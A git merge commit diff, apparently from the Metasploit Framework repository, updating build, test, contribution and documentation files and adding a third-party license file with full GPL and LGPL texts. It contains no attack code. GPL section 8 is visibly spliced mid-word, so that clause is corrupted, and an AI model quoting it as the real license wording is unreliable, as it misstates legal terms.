Merge remote branch 'wchen-r7/better_tectia_ssh'

next_message can be nil sometimes if packet is nil (see net/ssh's
poll_message source)

.gitignore

@@ -1,10 +1,23 @@
+# Rubymine project directory
+.idea
+# RVM control file
+.rvmrc
+# YARD cache directory
+.yardoc
+# Mac OS X files
+.DS_Store
+# simplecov coverage data
+coverage
 data/meterpreter/ext_server_pivot.dll
 data/meterpreter/ext_server_pivot.x64.dll
+doc
 external/source/meterpreter/java/bin
 external/source/meterpreter/java/build
 external/source/meterpreter/java/extensions
 external/source/javapayload/bin
 external/source/javapayload/build
+# Packaging directory
+pkg
 tags
 *.swp
 *.orig

.rspec

@@ -0,0 +1,2 @@
+--color
+--format documentation

.travis.yml

@@ -0,0 +1,8 @@
+language: ruby
+rvm:
+  - '1.8.7'
+  - '1.9.3'
+
+notifications:
+  irc: "irc.freenode.org#msfnotify"
+

CONTRIBUTING.md

@@ -0,0 +1,33 @@
+# Contributing to Metasploit
+
+## Reporting Bugs
+
+If you would like to report a bug, please take a look at [our Redmine
+issue
+tracker](https://dev.metasploit.com/redmine/projects/framework/issues?query_id=420)
+-- your bug may already have been reported there! Simply [searching](https://dev.metasploit.com/redmine/projects/framework/search) for some appropriate keywords may save everyone a lot of hassle.
+
+If your bug is new and you'd like to report it you will need to
+[register
+first](https://dev.metasploit.com/redmine/account/register). Don't
+worry, it's easy and fun and takes about 30 seconds.
+
+## Contributing Metasploit Modules
+
+If you have an exploit that you'd like to contribute to the Metasploit
+Framework, please familiarize yourself with the
+**[HACKING](https://github.com/rapid7/metasploit-framework/blob/master/HACKING)**
+document in the
+Metasploit-Framework repository. There are many mysteries revealed in
+HACKING concerning code style and content.
+
+[Pull requests](https://github.com/rapid7/metasploit-framework/pulls)
+should corellate with modules at a 1:1 ratio
+-- there is rarely a good reason to have two, three, or ten modules on
+one pull request, as this dramatically increases the review time
+required to land (commit) any of those modules.
+
+Pull requests tend to be very collaborative for Metasploit -- do not be
+surprised if your pull request to rapid7/metasploit-framework triggers a
+pull request back to your own fork. In this way, we can isolate working
+changes before landing your PR to the Metasploit master branch.

COPYING

@@ -1,4 +1,4 @@
-Copyright (C) 2006-2012, Rapid7 LLC
+Copyright (C) 2006-2012, Rapid7 Inc.
 All rights reserved.
 
 Redistribution and use in source and binary forms, with or without modification,
@@ -49,21 +49,5 @@ This license does not apply to the following components:
  - The Zip library located under lib/zip
  - The SSHKey library located under lib/sshkey
 
-The latest version of this software is available from http://metasploit.com/
-
-Bug tracking and development information can be found at:
- https://dev.metasploit.com/redmine/projects/framework/
-
-The public GitHub source repository can be found at:
- https://github.com/rapid7/metasploit-framework
-
-Questions and suggestions can be sent to:
- msfdev[at]metasploit.com
-
-The framework mailing list is the place to discuss features and ask for help.
-To subscribe, visit the following web page:
- https://mail.metasploit.com/mailman/listinfo/framework
-
-The archives are available from:
- https://mail.metasploit.com/pipermail/framework/
+Details for the above packages can be found in the THIRD-PARTY file.
 

Gemfile

@@ -1,8 +1,30 @@
 source 'http://rubygems.org'
-gem 'rails', '3.2.2'
-gem 'metasploit_data_models', '0.0.2', :git => "git://github.com/rapid7/metasploit_data_models.git"
-gem 'pg', '>=0.13'
-gem 'msgpack'
-gem 'nokogiri'
 
+# Need 3+ for ActiveSupport::Concern
+gem 'activesupport', '>= 3.0.0'
+# Needed for Msf::DbManager
+gem 'activerecord'
+# Database models shared between framework and Pro.
+gem 'metasploit_data_models', :git => 'git://github.com/rapid7/metasploit_data_models.git', :tag => '0.3.0'
+# Needed for module caching in Mdm::ModuleDetails
+gem 'pg', '>= 0.11'
 
+group :development do
+  # Markdown formatting for yard
+  gem 'redcarpet'
+  # generating documentation
+  gem 'yard'
+end
+
+group :development, :test do
+  # running documentation generation tasks and rspec tasks
+  gem 'rake'
+end
+
+group :test do
+  # testing framework
+  gem 'rspec'
+  # code coverage for tests
+  # any version newer than 0.5.4 gives an Encoding error when trying to read the source files.
+  gem 'simplecov', '0.5.4', :require => false
+end

Gemfile.lock

@@ -0,0 +1,68 @@
+GIT
+  remote: git://github.com/rapid7/metasploit_data_models.git
+  revision: 73f26789500f278dd6fd555e839d09a3b81a05f4
+  tag: 0.3.0
+  specs:
+    metasploit_data_models (0.3.0)
+      activerecord
+      activesupport
+      pg
+      pry
+
+GEM
+  remote: http://rubygems.org/
+  specs:
+    activemodel (3.2.8)
+      activesupport (= 3.2.8)
+      builder (~> 3.0.0)
+    activerecord (3.2.8)
+      activemodel (= 3.2.8)
+      activesupport (= 3.2.8)
+      arel (~> 3.0.2)
+      tzinfo (~> 0.3.29)
+    activesupport (3.2.8)
+      i18n (~> 0.6)
+      multi_json (~> 1.0)
+    arel (3.0.2)
+    builder (3.0.3)
+    coderay (1.0.8)
+    diff-lcs (1.1.3)
+    i18n (0.6.1)
+    method_source (0.8.1)
+    multi_json (1.3.6)
+    pg (0.14.1)
+    pry (0.9.10)
+      coderay (~> 1.0.5)
+      method_source (~> 0.8)
+      slop (~> 3.3.1)
+    rake (0.9.2.2)
+    redcarpet (2.1.1)
+    rspec (2.11.0)
+      rspec-core (~> 2.11.0)
+      rspec-expectations (~> 2.11.0)
+      rspec-mocks (~> 2.11.0)
+    rspec-core (2.11.1)
+    rspec-expectations (2.11.3)
+      diff-lcs (~> 1.1.3)
+    rspec-mocks (2.11.3)
+    simplecov (0.5.4)
+      multi_json (~> 1.0.3)
+      simplecov-html (~> 0.5.3)
+    simplecov-html (0.5.3)
+    slop (3.3.3)
+    tzinfo (0.3.33)
+    yard (0.8.2.1)
+
+PLATFORMS
+  ruby
+
+DEPENDENCIES
+  activerecord
+  activesupport (>= 3.0.0)
+  metasploit_data_models!
+  pg (>= 0.11)
+  rake
+  redcarpet
+  rspec
+  simplecov (= 0.5.4)
+  yard

HACKING

@@ -31,10 +31,10 @@ interfaces other than msfconsole, such as msfrpc and msfgui, won't see
 your output.  You can use print_line to accomplish the same thing as
 puts. 
 
-2. Don't read from from standard input, doing so will make your code 
+2. Don't read from standard input, doing so will make your code 
 lock up the entire module when called from other interfaces. If you 
 need user input, you can either register an option or expose an 
-interactve session type specific for the type of exploit.
+interactive session type specific for the type of exploit.
 
 3. Don't use "sleep". It has been known to cause issues with
 multi-threaded programs on various platforms. Instead, we use
@@ -48,7 +48,7 @@ the creation of ruby sockets and won't know how to clean them up in
 case your module raises an exception without cleaning up after itself.
 Secondly, non-Rex sockets do not know about routes and therefore can't
 be used through a meterpreter tunnel.  Lastly, regular sockets miss
-out on msf's proxy and ssl features.  Msf includes many protocols
+out on msf's proxy and SSL features.  Msf includes many protocols
 already implemented with Rex and if the protocol you need is missing,
 porting another library to use them is straight-forward.  See our
 Net::SSH modifications in lib/net/ssh/ for an example.
@@ -112,13 +112,19 @@ Submitting Your Code
 
 The process for submitting new modules via GitHub is documented here:
 
-https://github.com/rapid7/metasploit-framework/wiki/Working-with-the-Framework-Repo
+https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment
 
 This describes the process of forking, editing, and generating a
 pull request, and is the preferred method for bringing new modules
 and framework enhancements to the attention of the core Metasploit
 development team. Note that this process requires a GitHub account.
 
+For Git commits, please adhere to 50/72 formatting: your commits should
+start with a line 50 characters or less, followed by a blank line,
+followed by one or more lines of explanatory text wrapped at at 72
+characters Pull requests with commits not formatted this way will
+be rejected without review.
+
 For modules, note that Author field is not automatic, and should be 
 filled in in the format of 'Your Name <user[at]domain.tld>' so future 
 developers can contact you with any questions.

README.md

@@ -0,0 +1,55 @@
+
+Metasploit [![Build Status](https://travis-ci.org/rapid7/metasploit-framework.png)](https://travis-ci.org/rapid7/metasploit-framework) [![Code Climate](https://codeclimate.com/badge.png)](https://codeclimate.com/github/rapid7/metasploit-framework)
+==
+The Metasploit Framework is released under a BSD-style license. See
+COPYING for more details.
+
+The latest version of this software is available from http://metasploit.com/
+
+Bug tracking and development information can be found at:
+ https://dev.metasploit.com/redmine/projects/framework/
+
+The public GitHub source repository can be found at:
+ https://github.com/rapid7/metasploit-framework
+
+Questions and suggestions can be sent to:
+ msfdev(at)metasploit.com
+
+The framework mailing list is the place to discuss features and ask for help.
+To subscribe, visit the following web page:
+ https://mail.metasploit.com/mailman/listinfo/framework
+
+The mailing list archives are available from:
+ https://mail.metasploit.com/pipermail/framework/
+
+Installing
+--
+Generally, you should use the installer which contains all dependencies
+and will get you up and running with a few clicks. See the [Dev
+Environment Setup][wiki-devenv] if you'd like to deal with dependencies
+on your own.
+
+Using Metasploit
+--
+Metasploit can do all sorts of things. The first thing you'll want to do
+is start `msfconsole`, but after that, you'll probably be best served by
+reading some of the great tutorials online:
+
+  * [Metasploit Unleashed][unleashed]
+  * [The official Metasploit wiki on Github][wiki-start]
+
+Contributing
+--
+See the [Dev Environment Setup][wiki-devenv] guide on GitHub which will
+walk you through the whole process starting from installing all the
+dependencies, to cloning the repository, and finally to submitting a
+pull request. For slightly more info, see
+[Contributing](https://github.com/rapid7/metasploit-framework/blob/master/CONTRIBUTING.md).
+
+
+[wiki-devenv]: https://github.com/rapid7/metasploit-framework/wiki/Metasploit-Development-Environment "Metasploit Development Environment Setup"
+[wiki-start]: https://github.com/rapid7/metasploit-framework/wiki/ "Metasploit Wiki"
+[wiki-usage]: https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit "Using Metasploit"
+[unleashed]: http://www.offensive-security.com/metasploit-unleashed/ "Metasploit Unleashed"
+
+

Rakefile

@@ -0,0 +1,47 @@
+require 'bundler/setup'
+
+require 'rspec/core/rake_task'
+require 'yard'
+
+RSpec::Core::RakeTask.new(:spec)
+
+task :default => :spec
+
+namespace :yard do
+  yard_files = [
+      # Ruby source files first
+      'lib/msf/**/*.rb',
+      'lib/rex/**/*.rb',
+      # Anything after '-' is a normal documentation, not source
+      '-',
+      'COPYING',
+      'HACKING',
+      'THIRD-PARTY.md'
+  ]
+  yard_options = [
+      # include documentation for protected methods for developers extending the code.
+      '--protected'
+  ]
+
+  YARD::Rake::YardocTask.new(:doc) do |t|
+    t.files = yard_files
+    # --no-stats here as 'stats' task called after will print fuller stats
+    t.options = yard_options + ['--no-stats']
+
+    t.after = Proc.new {
+      Rake::Task['yard:stats'].execute
+    }
+  end
+
+  desc "Shows stats for YARD Documentation including listing undocumented modules, classes, constants, and methods"
+  task :stats => :environment do
+    stats = YARD::CLI::Stats.new
+    yard_arguments = yard_options + ['--compact', '--list-undoc'] + yard_files
+    stats.run(*yard_arguments)
+  end
+end
+
+# @todo Figure out how to just clone description from yard:doc
+desc "Generate YARD documentation"
+# allow calling namespace to as a task that goes to default task for namespace
+task :yard => ['yard:doc']

THIRD-PARTY.md

@@ -0,0 +1,1083 @@
+
+
+This file lists bundled packages and their associated licensing terms.
+
+
+ - The Packet Sniffer SDK (MicroOLAP) library embedded into the Meterpreter
+   Sniffer extension. HD Moore has a single-seat developer license.
+ - The Rabal library located under lib/rabal
+
+
+
+
+Ruby
+====
+ - The Bit-Struct library located under lib/bit-struct.
+   Copyright (c) 2005-2009, Joel VanderWerf.
+ - The SNMP library located under lib/snmp.
+   Copyright (c) 2004 David R. Halliday
+ - The Zip library located under lib/zip.
+   Copyright (C) 2002-2004 Thomas Sondergaard
+ - Gem components located under lib/gemcache/
+   * rdoc - RDoc is Copyright (c) 2001-2003 Dave Thomas, The Pragmatic Programmers.
+   Portions (c) 2007-2011 Eric Hodel.  Portions copyright others, see individual
+   files for details.
+   * eventmachine - Copyright (C) 2006-07 by Francis Cianfrocca
+   * json - Copyright Daniel Luz <dev at mernen dot com>
+   * pg - Copyright (c) 1997-2012 by the authors
+
+
+
+````
+  1. You may make and give away verbatim copies of the source form of the
+     software without restriction, provided that you duplicate all of the
+     original copyright notices and associated disclaimers.
+
+  2. You may modify your copy of the software in any way, provided that
+     you do at least ONE of the following:
+
+       a) place your modifications in the Public Domain or otherwise
+          make them Freely Available, such as by posting said
+    modifications to Usenet or an equivalent medium, or by allowing
+    the author to include your modifications in the software.
+
+       b) use the modified software only within your corporation or
+          organization.
+
+       c) rename any non-standard executables so the names do not conflict
+    with standard executables, which must also be provided.
+
+       d) make other distribution arrangements with the author.
+
+  3. You may distribute the software in object code or executable
+     form, provided that you do at least ONE of the following:
+
+       a) distribute the executables and library files of the software,
+    together with instructions (in the manual page or equivalent)
+    on where to get the original distribution.
+
+       b) accompany the distribution with the machine-readable source of
+    the software.
+
+       c) give non-standard executables non-standard names, with
+          instructions on where to get the original software distribution.
+
+       d) make other distribution arrangements with the author.
+
+  4. You may modify and include the part of the software into any other
+     software (possibly commercial).  But some files in the distribution
+     are not written by the author, so that they are not under this terms.
+
+     They are gc.c(partly), utils.c(partly), regex.[ch], st.[ch] and some
+     files under the ./missing directory.  See each file for the copying
+     condition.
+
+  5. The scripts and library files supplied as input to or produced as 
+     output from the software do not automatically fall under the
+     copyright of the software, but belong to whomever generated them, 
+     and may be sold commercially, and may be aggregated with this
+     software.
+
+  6. THIS SOFTWARE IS PROVIDED "AS IS" AND WITHOUT ANY EXPRESS OR
+     IMPLIED WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED
+     WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+     PURPOSE.
+
+````
+
+
+PacketFu
+========
+ - The PacketFu library located under lib/packetfu.
+   Copyright (c) 2008-2012, Tod Beardsley
+
+````
+Copyright (c) 2008-2012, Tod Beardsley
+All rights reserved.
+
+Redistribution and use in source and binary forms, with or without
+modification, are permitted provided that the following conditions are met:
+
+    * Redistributions of source code must retain the above copyright
+      notice, this list of conditions and the following disclaimer.
+    * Redistributions in binary form must reproduce the above copyright
+      notice, this list of conditions and the following disclaimer in the
+      documentation and/or other materials provided with the distribution.
+    * Neither the name of Tod Beardsley nor the
+      names of its contributors may be used to endorse or promote products
+      derived from this software without specific prior written permission.
+
+THIS SOFTWARE IS PROVIDED BY TOD BEARDSLEY ''AS IS'' AND ANY
+EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
+WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
+DISCLAIMED. IN NO EVENT SHALL TOD BEARDSLEY BE LIABLE FOR ANY
+DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
+(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
+ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
+(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
+SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
+````
+
+
+
+GPL
+===
+ - The modified TightVNC binaries and their associated source code.
+
+````
+                    GNU GENERAL PUBLIC LICENSE
+                       Version 2, June 1991
+
+ Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
+ 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+                            Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+License is intended to guarantee your freedom to share and change free
+software--to make sure the software is free for all its users.  This
+General Public License applies to most of the Free Software
+Foundation's software and to any other program whose authors commit to
+using it.  (Some other Free Software Foundation software is covered by
+the GNU Lesser General Public License instead.)  You can apply it to
+your programs, too.
+
+  When we speak of free software, we are referring to freedom, not
+price.  Our General Public Licenses are designed to make sure that you
+have the freedom to distribute copies of free software (and charge for
+this service if you wish), that you receive source code or can get it
+if you want it, that you can change the software or use pieces of it
+in new free programs; and that you know you can do these things.
+
+  To protect your rights, we need to make restrictions that forbid
+anyone to deny you these rights or to ask you to surrender the rights.
+These restrictions translate to certain responsibilities for you if you
+distribute copies of the software, or if you modify it.
+
+  For example, if you distribute copies of such a program, whether
+gratis or for a fee, you must give the recipients all the rights that
+you have.  You must make sure that they, too, receive or can get the
+source code.  And you must show them these terms so they know their
+rights.
+
+  We protect your rights with two steps: (1) copyright the software, and
+(2) offer you this license which gives you legal permission to copy,
+distribute and/or modify the software.
+
+  Also, for each author's protection and ours, we want to make certain
+that everyone understands that there is no warranty for this free
+software.  If the software is modified by someone else and passed on, we
+want its recipients to know that what they have is not the original, so
+that any problems introduced by others will not reflect on the original
+authors' reputations.
+
+  Finally, any free program is threatened constantly by software
+patents.  We wish to avoid the danger that redistributors of a free
+program will individually obtain patent licenses, in effect making the
+program proprietary.  To prevent this, we have made it clear that any
+patent must be licensed for everyone's free use or not licensed at all.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.
+
+                    GNU GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License applies to any program or other work which contains
+a notice placed by the copyright holder saying it may be distributed
+under the terms of this General Public License.  The "Program", below,
+refers to any such program or work, and a "work based on the Program"
+means either the Program or any derivative work under copyright law:
+that is to say, a work containing the Program or a portion of it,
+either verbatim or with modifications and/or translated into another
+language.  (Hereinafter, translation is included without limitation in
+the term "modification".)  Each licensee is addressed as "you".
+
+Activities other than copying, distribution and modification are not
+covered by this License; they are outside its scope.  The act of
+running the Program is not restricted, and the output from the Program
+is covered only if its contents constitute a work based on the
+Program (independent of having been made by running the Program).
+Whether that is true depends on what the Program does.
+
+  1. You may copy and distribute verbatim copies of the Program's
+source code as you receive it, in any medium, provided that you
+conspicuously and appropriately publish on each copy an appropriate
+copyright notice and disclaimer of warranty; keep intact all the
+notices that refer to this License and to the absence of any warranty;
+and give any other recipients of the Program a copy of this License
+along with the Program.
+
+You may charge a fee for the physical act of transferring a copy, and
+you may at your option offer warranty protection in exchange for a fee.
+
+  2. You may modify your copy or copies of the Program or any portion
+of it, thus forming a work based on the Program, and copy and
+distribute such modifications or work under the terms of Section 1
+above, provided that you also meet all of these conditions:
+
+    a) You must cause the modified files to carry prominent notices
+    stating that you changed the files and the date of any change.
+
+    b) You must cause any work that you distribute or publish, that in
+    whole or in part contains or is derived from the Program or any
+    part thereof, to be licensed as a whole at no charge to all third
+    parties under the terms of this License.
+
+    c) If the modified program normally reads commands interactively
+    when run, you must cause it, when started running for such
+    interactive use in the most ordinary way, to print or display an
+    announcement including an appropriate copyright notice and a
+    notice that there is no warranty (or else, saying that you provide
+    a warranty) and that users may redistribute the program under
+    these conditions, and telling the user how to view a copy of this
+    License.  (Exception: if the Program itself is interactive but
+    does not normally print such an announcement, your work based on
+    the Program is not required to print an announcement.)
+
+These requirements apply to the modified work as a whole.  If
+identifiable sections of that work are not derived from the Program,
+and can be reasonably considered independent and separate works in
+themselves, then this License, and its terms, do not apply to those
+sections when you distribute them as separate works.  But when you
+distribute the same sections as part of a whole which is a work based
+on the Program, the distribution of the whole must be on the terms of
+this License, whose permissions for other licensees extend to the
+entire whole, and thus to each and every part regardless of who wrote it.
+
+Thus, it is not the intent of this section to claim rights or contest
+your rights to work written entirely by you; rather, the intent is to
+exercise the right to control the distribution of derivative or
+collective works based on the Program.
+
+In addition, mere aggregation of another work not based on the Program
+with the Program (or with a work based on the Program) on a volume of
+a storage or distribution medium does not bring the other work under
+the scope of this License.
+
+  3. You may copy and distribute the Program (or a work based on it,
+under Section 2) in object code or executable form under the terms of
+Sections 1 and 2 above provided that you also do one of the following:
+
+    a) Accompany it with the complete corresponding machine-readable
+    source code, which must be distributed under the terms of Sections
+    1 and 2 above on a medium customarily used for software interchange; or,
+
+    b) Accompany it with a written offer, valid for at least three
+    years, to give any third party, for a charge no more than your
+    cost of physically performing source distribution, a complete
+    machine-readable copy of the corresponding source code, to be
+    distributed under the terms of Sections 1 and 2 above on a medium
+    customarily used for software interchange; or,
+
+    c) Accompany it with the information you received as to the offer
+    to distribute corresponding source code.  (This alternative is
+    allowed only for noncommercial distribution and only if you
+    received the program in object code or executable form with such
+    an offer, in accord with Subsection b above.)
+
+The source code for a work means the preferred form of the work for
+making modifications to it.  For an executable work, complete source
+code means all the source code for all modules it contains, plus any
+associated interface definition files, plus the scripts used to
+control compilation and installation of the executable.  However, as a
+special exception, the source code distributed need not include
+anything that is normally distributed (in either source or binary
+form) with the major components (compiler, kernel, and so on) of the
+operating system on which the executable runs, unless that component
+itself accompanies the executable.
+
+If distribution of executable or object code is made by offering
+access to copy from a designated place, then offering equivalent
+access to copy the source code from the same place counts as
+distribution of the source code, even though third parties are not
+compelled to copy the source along with the object code.
+
+  4. You may not copy, modify, sublicense, or distribute the Program
+except as expressly provided under this License.  Any attempt
+otherwise to copy, modify, sublicense or distribute the Program is
+void, and will automatically terminate your rights under this License.
+However, parties who have received copies, or rights, from you under
+this License will not have their licenses terminated so long as such
+parties remain in full compliance.
+
+  5. You are not required to accept this License, since you have not
+signed it.  However, nothing else grants you permission to modify or
+distribute the Program or its derivative works.  These actions are
+prohibited by law if you do not accept this License.  Therefore, by
+modifying or distributing the Program (or any work based on the
+Program), you indicate your acceptance of this License to do so, and
+all its terms and conditions for copying, distributing or modifying
+the Program or works based on it.
+
+  6. Each time you redistribute the Program (or any work based on the
+Program), the recipient automatically receives a license from the
+original licensor to copy, distribute or modify the Program subject to
+these terms and conditions.  You may not impose any further
+restrictions on the recipients' exercise of the rights granted herein.
+You are not responsible for enforcing compliance by third parties to
+this License.
+
+  7. If, as a consequence of a court judgment or allegation of patent
+infringement or for any other reason (not limited to patent issues),
+conditions are imposed on you (whether by court order, agreement or
+otherwise) that contradict the conditions of this License, they do not
+excuse you from the conditions of this License.  If you cannot
+distribute so as to satisfy simultaneously your obligations under this
+License and any other pertinent obligations, then as a consequence you
+may not distribute the Program at all.  For example, if a patent
+license would not permit royalty-free redistribution of the Program by
+all those who receive copies directly or indirectly through you, then
+the only way you could satisfy both it and this License would be to
+refrain entirely from distribution of the Program.
+
+If any portion of this section is held invalid or unenforceable under
+any particular circumstance, the balance of the section is intended to
+apply and the section as a whole is intended to apply in other
+circumstances.
+
+It is not the purpose of this section to induce you to infringe any
+patents or other property right claims or to contest validity of any
+such claims; this section has the sole purpose of protecting the
+integrity of the free software distribution system, which is
+implemented by public license practices.  Many people have made
+generous contributions to the wide range of software distributed
+through that system in reliance on consistent application of that
+system; it is up to the author/donor to decide if he or she is willing
+to distribute software through any other system and a licensee cannot
+impose that choice.
+
+This section is intended to make thoroughly clear what is believed to
+be a consequence of the rest of this License.
+
+  8. If the distribution and/or use of the Prot holder who places the Program under this License
+may add an explicit geographical distribution limitation excluding
+those countries, so that distribution is permitted only in or among
+countries not thus excluded.  In such case, this License incorporates
+the limitation as if written in the body of this License.
+
+  9. The Free Software Foundation may publish revised and/or new versions
+of the General Public License from time to time.  Such new versions will
+be similar in spirit to the present version, but may differ in detail to
+address new problems or concerns.
+
+Each version is given a distinguishing version number.  If the Program
+specifies a version number of this License which applies to it and "any
+later version", you have the option of following the terms and conditions
+either of that version or of any later version published by the Free
+Software Foundation.  If the Program does not specify a version number of
+this License, you may choose any version ever published by the Free Software
+Foundation.
+
+  10. If you wish to incorporate parts of the Program into other free
+programs whose distribution conditions are different, write to the author
+to ask for permission.  For software which is copyrighted by the Free
+Software Foundation, write to the Free Software Foundation; we sometimes
+make exceptions for this.  Our decision will be guided by the two goals
+of preserving the free status of all derivatives of our free software and
+of promoting the sharing and reuse of software generally.
+
+                            NO WARRANTY
+
+  11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
+FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW.  EXCEPT WHEN
+OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
+PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
+OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
+MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE.  THE ENTIRE RISK AS
+TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU.  SHOULD THE
+PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
+REPAIR OR CORRECTION.
+
+  12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
+WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
+REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
+INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
+OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
+TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
+YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
+PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
+POSSIBILITY OF SUCH DAMAGES.
+
+                     END OF TERMS AND CONDITIONS
+
+````
+
+
+
+LGPL
+====
+ - The Metasm library located under lib/metasm.
+   Copyright (C) 2006-2010 Yoann GUILLOT
+ - The PcapRub library located under external/pcaprub
+ - The Ruby-Lorcon library located under external/ruby-lorcon
+ - Gem components located under lib/gemcache/
+   * coderay - Copyright (c) 2006-2011 by murphy (Kornelius Kalnbach) <murphy rubychan de>
+
+
+````
+		  GNU LESSER GENERAL PUBLIC LICENSE
+		       Version 2.1, February 1999
+
+ Copyright (C) 1991, 1999 Free Software Foundation, Inc.
+ 51 Franklin Street, Fifth Floor, Boston, MA  02110-1301  USA
+ Everyone is permitted to copy and distribute verbatim copies
+ of this license document, but changing it is not allowed.
+
+[This is the first released version of the Lesser GPL.  It also counts
+ as the successor of the GNU Library Public License, version 2, hence
+ the version number 2.1.]
+
+			    Preamble
+
+  The licenses for most software are designed to take away your
+freedom to share and change it.  By contrast, the GNU General Public
+Licenses are intended to guarantee your freedom to share and change
+free software--to make sure the software is free for all its users.
+
+  This license, the Lesser General Public License, applies to some
+specially designated software packages--typically libraries--of the
+Free Software Foundation and other authors who decide to use it.  You
+can use it too, but we suggest you first think carefully about whether
+this license or the ordinary General Public License is the better
+strategy to use in any particular case, based on the explanations below.
+
+  When we speak of free software, we are referring to freedom of use,
+not price.  Our General Public Licenses are designed to make sure that
+you have the freedom to distribute copies of free software (and charge
+for this service if you wish); that you receive source code or can get
+it if you want it; that you can change the software and use pieces of
+it in new free programs; and that you are informed that you can do
+these things.
+
+  To protect your rights, we need to make restrictions that forbid
+distributors to deny you these rights or to ask you to surrender these
+rights.  These restrictions translate to certain responsibilities for
+you if you distribute copies of the library or if you modify it.
+
+  For example, if you distribute copies of the library, whether gratis
+or for a fee, you must give the recipients all the rights that we gave
+you.  You must make sure that they, too, receive or can get the source
+code.  If you link other code with the library, you must provide
+complete object files to the recipients, so that they can relink them
+with the library after making changes to the library and recompiling
+it.  And you must show them these terms so they know their rights.
+
+  We protect your rights with a two-step method: (1) we copyright the
+library, and (2) we offer you this license, which gives you legal
+permission to copy, distribute and/or modify the library.
+
+  To protect each distributor, we want to make it very clear that
+there is no warranty for the free library.  Also, if the library is
+modified by someone else and passed on, the recipients should know
+that what they have is not the original version, so that the original
+author's reputation will not be affected by problems that might be
+introduced by others.
+
+  Finally, software patents pose a constant threat to the existence of
+any free program.  We wish to make sure that a company cannot
+effectively restrict the users of a free program by obtaining a
+restrictive license from a patent holder.  Therefore, we insist that
+any patent license obtained for a version of the library must be
+consistent with the full freedom of use specified in this license.
+
+  Most GNU software, including some libraries, is covered by the
+ordinary GNU General Public License.  This license, the GNU Lesser
+General Public License, applies to certain designated libraries, and
+is quite different from the ordinary General Public License.  We use
+this license for certain libraries in order to permit linking those
+libraries into non-free programs.
+
+  When a program is linked with a library, whether statically or using
+a shared library, the combination of the two is legally speaking a
+combined work, a derivative of the original library.  The ordinary
+General Public License therefore permits such linking only if the
+entire combination fits its criteria of freedom.  The Lesser General
+Public License permits more lax criteria for linking other code with
+the library.
+
+  We call this license the "Lesser" General Public License because it
+does Less to protect the user's freedom than the ordinary General
+Public License.  It also provides other free software developers Less
+of an advantage over competing non-free programs.  These disadvantages
+are the reason we use the ordinary General Public License for many
+libraries.  However, the Lesser license provides advantages in certain
+special circumstances.
+
+  For example, on rare occasions, there may be a special need to
+encourage the widest possible use of a certain library, so that it becomes
+a de-facto standard.  To achieve this, non-free programs must be
+allowed to use the library.  A more frequent case is that a free
+library does the same job as widely used non-free libraries.  In this
+case, there is little to gain by limiting the free library to free
+software only, so we use the Lesser General Public License.
+
+  In other cases, permission to use a particular library in non-free
+programs enables a greater number of people to use a large body of
+free software.  For example, permission to use the GNU C Library in
+non-free programs enables many more people to use the whole GNU
+operating system, as well as its variant, the GNU/Linux operating
+system.
+
+  Although the Lesser General Public License is Less protective of the
+users' freedom, it does ensure that the user of a program that is
+linked with the Library has the freedom and the wherewithal to run
+that program using a modified version of the Library.
+
+  The precise terms and conditions for copying, distribution and
+modification follow.  Pay close attention to the difference between a
+"work based on the library" and a "work that uses the library".  The
+former contains code derived from the library, whereas the latter must
+be combined with the library in order to run.
+
+		  GNU LESSER GENERAL PUBLIC LICENSE
+   TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
+
+  0. This License Agreement applies to any software library or other
+program which contains a notice placed by the copyright holder or
+other authorized party saying it may be distributed under the terms of
+this Lesser General Public License (also called "this License").
+Each licensee is addressed as "you".
+
+  A "library" means a collection of software functions and/or data
+prepared so as to be conveniently linked with application programs
